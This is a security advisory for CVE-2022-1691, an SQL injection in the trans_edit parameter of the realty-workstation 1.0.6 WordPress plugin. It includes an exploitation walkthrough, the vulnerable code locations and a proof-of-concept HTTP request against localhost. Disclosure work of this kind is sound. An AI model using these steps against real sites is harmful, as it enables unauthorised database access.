realty-workstation 1.0.6 WordPress plugin SQL injection
Vulnerability Metadata
Key | Value |
---|---|
Date of Disclosure | May 09 2022 |
Affected Software | realty-workstation |
Affected Software Type | WordPress plugin |
Version | 1.0.6 |
Weakness | SQL Injection |
CWE ID | CWE-89 |
CVE ID | CVE-2022-1691 |
CVSS 3.x Base Score | 4.9 |
CVSS 2.0 Base Score | 4.0 |
Reporter | Daniel Krohmer, Shi Chen |
Reporter Contact | daniel.krohmer@iese.fraunhofer.de |
Link to Affected Software | https://wordpress.org/plugins/realty-workstation |
Link to Vulnerability DB | https://nvd.nist.gov/vuln/detail/CVE-2022-1691 |
Vulnerability Description
The trans_edit
query parameter in realty-workstation 1.0.6 is vulnerable to SQL injection. An existing agent may abuse Edit
functionality of the plugin to craft a malicious GET request.
Exploitation Guide
Login as admin
user.
Go to Realty Workstation
and click on Agents
.
Add a new agent by clicking on Add New Agent
.
Provide arbitrary user information, then click on Save
.
Go to Realty Workstation
and then hit Agent Transactions
.
Fill some arbitrary data and click on Save
.
As an unauthenticated user, visit the main blog page and go to the Workstation
Sign in with the credentials of the previously created agent.
Click on Edit
in the agent view of the workstation.
Clicking the previous button triggers the vulnerable request. trans_edit
is the vulnerable query parameter.
A POC may look like the following request:
Important: The exploit works for both transactions=open_agent_transactions
as well as transactions=open_transactions
.
In the code, the vulnerability is triggered by unsanitized user input of trans_edit
at line 190 in ./public/template/agent-page.php
.
The final database query is called at line 30 in ./cn_package/includes/class-workstation-query.php
.
Exploit Payload
Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work. The SQL injection can be triggered by sending the request below.
GET /?page_id=286&transactions=open_transactions&trans_edit=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/?page_id=286&transactions=open_agent_transactions&trans_edit=1
Cookie: PHPSESSID=rmv93d526mhc8cvjf72hdaacrk; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1651756511%7CcItznI8IWbEEnPDRsizkJZkrYojSFqzr2ySRUf1DEys%7C27bbb08bd6cc4106de1fd37daf991abff108f78ed51facd7e7d37c86c40b901a; wp-settings-1=editor%3Dtinymce%26amplibraryContent%3Dbrowse%26wd_ads_manage_groups_tab%3Dpop; wp-settings-time-1=1651583711
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin